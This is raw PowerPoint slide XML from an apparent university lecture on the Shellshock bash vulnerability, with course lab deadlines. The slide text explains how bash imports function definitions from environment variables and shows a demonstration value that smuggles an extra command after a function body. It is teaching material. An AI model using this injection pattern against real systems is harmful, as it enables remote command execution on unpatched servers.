Target="../media/image1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5.xml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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink13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image" Target="../media/image3.png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24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.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink51.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink17.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink54.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink13.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink45.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink49.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink53.xml"/><Relationship Id="rId9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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink14.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink48.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink52.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink18.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink55.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink50.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37.xml"/><Relationship Id="rId77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84316" y="2975873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8: Shellshock Attack (Part 2)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5F1B66-6D93-5B20-A357-0C3F018BEF01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="2721422"/>
            <a:ext cx="7273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}’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2407E-B05C-2F2E-AAAF-AD850E32572C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2026006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also define shell functions as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>environment variables 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3FF422A-86AD-BBBB-75CA-EC7754E73758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4573482" y="3091771"/>
            <a:ext cx="291505" cy="751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3B6EAF02-6AE5-D613-E18B-99F20EDC0C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8121948" y="610105"/>
            <a:ext cx="291505" cy="57150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96FAD-9F89-2021-0330-8372A7F6A6C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4306300" y="365278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88E6E-B72C-07AF-1130-DAB6EE80D1AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7854766" y="3652780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value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513E4F0-3572-44D5-C6EE-0D7937778C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12907194">
            <a:off x="3136406" y="4550161"/>
            <a:ext cx="990600" cy="228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4F6CD-4C27-8301-409C-299A0DFFD56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3985532" y="4869738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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237136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1336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191291" y="19133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580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4196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64008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5484753" y="19780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48" y="4418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2201284" y="88906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644" y="8026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64" y="320386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444" y="327946"/>
                  <a:ext cx="119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82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26"/>
                  <a:ext cx="93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764" y="356026"/>
                  <a:ext cx="131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50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26"/>
                  <a:ext cx="92880" cy="190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3676E-61A8-54A6-88FB-197C64DB2EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264844" y="484262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spawn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2800" dirty="0"/>
              <a:t>as a child process, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>special thing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>happens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16693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1336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191291" y="19133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4580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419600" y="3048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6400800" y="6858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5484753" y="19780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5148" y="4418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2201284" y="88906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FD3676E-61A8-54A6-88FB-197C64DB2EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264844" y="4842629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spawn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/bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>as a child process, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>special thing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>happens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772400" y="1296272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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336853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600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1774049" y="685800"/>
            <a:ext cx="492369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702624" y="2006955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" y="396385"/>
            <a:ext cx="741485" cy="7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189920" y="277729"/>
            <a:ext cx="1524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5715000" y="685800"/>
            <a:ext cx="468923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4553480" y="2006955"/>
            <a:ext cx="27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0" y="410784"/>
            <a:ext cx="858417" cy="8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1905000" y="75034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162800" y="33108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DA4B8-C439-741E-9A33-BBC752F80F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="3352800"/>
            <a:ext cx="331114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bash look for potential new shell functions?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46186"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="4042560"/>
          <a:ext cx="6134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79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426548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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1709884" y="3319906"/>
              <a:ext cx="377640" cy="84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00884" y="3310906"/>
                <a:ext cx="3952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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1730404" y="3935866"/>
              <a:ext cx="326520" cy="21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2404" y="3918226"/>
                <a:ext cx="36216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3048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152400" y="304800"/>
            <a:ext cx="16002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1774049" y="685800"/>
            <a:ext cx="492369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702624" y="2006955"/>
            <a:ext cx="262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5" y="396385"/>
            <a:ext cx="741485" cy="74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09B9F04-28B8-E1D3-43A3-3DA7ACC01BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4189920" y="277729"/>
            <a:ext cx="1524000" cy="3505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5D2B99-071E-2FDB-4A1E-5CD241D46040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="685800"/>
            <a:ext cx="468923" cy="26289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4406F9-7D71-3D46-0E7C-6FAB5C10B27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4553480" y="2006955"/>
            <a:ext cx="279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pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 2" descr="👶🏻 Baby: Light Skin Tone Emoji on Apple iOS 10.2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D21B8D10-59ED-FB51-830D-EDC9A1F0B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920" y="410784"/>
            <a:ext cx="858417" cy="85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7AE7754-487D-0F0A-44A7-C905A4F8E2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905000" y="75034"/>
            <a:ext cx="2095200" cy="372240"/>
            <a:chOff x="2201284" y="88906"/>
            <a:chExt cx="209520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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2201284" y="88906"/>
                <a:ext cx="2095200" cy="249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40EABF-CCCF-ACBD-83A1-33C5EA93828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192284" y="79906"/>
                  <a:ext cx="21128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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2805004" y="182146"/>
                <a:ext cx="134640" cy="234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63DAD48-5F0E-83D5-7A6B-11585BFA76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96004" y="173146"/>
                  <a:ext cx="152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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2735164" y="329386"/>
                <a:ext cx="158400" cy="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811059-F213-2932-8A91-F613F58938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26184" y="320386"/>
                  <a:ext cx="176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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2914084" y="336586"/>
                <a:ext cx="102240" cy="74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88B527-E468-93F4-E8A1-3E3636F2E54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5052" y="327586"/>
                  <a:ext cx="119942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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3060964" y="321466"/>
                <a:ext cx="76680" cy="91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CB94914-0A05-961F-2048-9A3A2E186B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1964" y="312466"/>
                  <a:ext cx="94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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3206044" y="266746"/>
                <a:ext cx="28440" cy="1767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F6A36C-6616-32A8-3C79-9E7CF8A14D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97044" y="257746"/>
                  <a:ext cx="46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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3213964" y="287626"/>
                <a:ext cx="75960" cy="77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423E32E-65DA-9A21-5F14-B7788266196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04964" y="278668"/>
                  <a:ext cx="93600" cy="949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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3233404" y="364666"/>
                <a:ext cx="114120" cy="792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2E4069F-D955-109F-441C-EF101469F4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224376" y="355666"/>
                  <a:ext cx="131816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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3389644" y="290146"/>
                <a:ext cx="55080" cy="171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8642B-A8DA-3861-D932-034CFE4031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380644" y="281146"/>
                  <a:ext cx="72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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3465244" y="282226"/>
                <a:ext cx="75240" cy="1724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C812675-091F-EFAB-34BE-612F537245C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456244" y="273245"/>
                  <a:ext cx="92880" cy="19004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0A23A6C-08A5-E09B-3DD0-6626500CC4CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="331080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Environment variables are inherited from the parent*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Bash will search through the env. variables for shell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DA4B8-C439-741E-9A33-BBC752F80F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="3352800"/>
            <a:ext cx="3311148" cy="64633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How does bash look for potential new shell functions?</a:t>
            </a:r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4042560"/>
          <a:ext cx="6134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79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426548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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1709884" y="3319906"/>
              <a:ext cx="377640" cy="846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D2F38A-9FF6-EA75-2DD3-F6081FCF64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700884" y="3310906"/>
                <a:ext cx="395280" cy="86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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1730404" y="3935866"/>
              <a:ext cx="326520" cy="2149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29546B7-7040-892F-BCC6-AC739CCAEA1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12424" y="3917836"/>
                <a:ext cx="362121" cy="2506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6E0FA1A-E056-3EEF-B5BD-D097241D6706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="4419600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 a vulnerable version of bash)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FD2FC-21D5-3DC3-F66F-6FCFCBF66EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="4796454"/>
            <a:ext cx="397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looks at the first 4 characters for a valid function definition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16804-BBD3-BD3B-3B20-F219772A446E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="5494461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4C44FA-CBAE-97ED-90D4-F1326EE529D4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15400" y="5523075"/>
            <a:ext cx="685800" cy="611505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B54F32CE-07B7-1ADE-8D5F-4B952AE0FD18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10068445">
            <a:off x="6063874" y="5854524"/>
            <a:ext cx="609600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47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772396"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="76200" y="4064357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5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604294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“extra”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706FBCB-DE76-D985-C3D5-B338216CE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68603"/>
            <a:ext cx="4038600" cy="25588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3668726" y="246255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51599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10" name="Table 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BAA8E05-66C4-48C4-48C5-619E748A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06478"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="1143000"/>
          <a:ext cx="7848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658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6042942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 echo “hello world”; }; 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echo “extra”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2FD298-C05C-A6E3-E960-65B427403970}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2458440" y="3399040"/>
              <a:ext cx="3643560" cy="20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2FD298-C05C-A6E3-E960-65B4274039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0440" y="3381400"/>
                <a:ext cx="3679200" cy="24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E10802B-67B2-6E0E-DD43-FF0B1762D2C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403106" y="3886200"/>
            <a:ext cx="1112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Bash recognizes this as a valid function definition, and begins to parse the string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271758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BEA04C-6A10-9DBE-5485-8577EAF4B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8200"/>
            <a:ext cx="10936535" cy="477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21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FD517-A54C-49C0-2442-281ED4E2D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838200"/>
            <a:ext cx="11235552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82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D899E6-39C5-A50D-092B-4D7E77CB39BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="23611"/>
            <a:ext cx="866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foo=‘() { echo “hello world”; };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 “extra”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102D2-EF6F-870F-3FC0-C007DAF8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38200"/>
            <a:ext cx="1144788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DC3A7-9C1D-C1E9-10EE-D517A2791FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1123816"/>
            <a:ext cx="1122294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Lab 1 (Set-UID) due on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Sunday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 2/12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Lab 2 (Shellshock) due on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Sunday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 2/19 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Friday’s class will be optional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Help session for lab 1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If you don’t need help, there is no need to come to class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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C80D2-A7BF-FDF3-5DA8-2EF64ED1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000"/>
            <a:ext cx="11358828" cy="550545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9132CA9E-2FB4-72A7-45CF-3005912A9561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6453870">
            <a:off x="9639096" y="1270369"/>
            <a:ext cx="609600" cy="685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115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333D77-F3A8-2581-07C7-34A02A9937E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
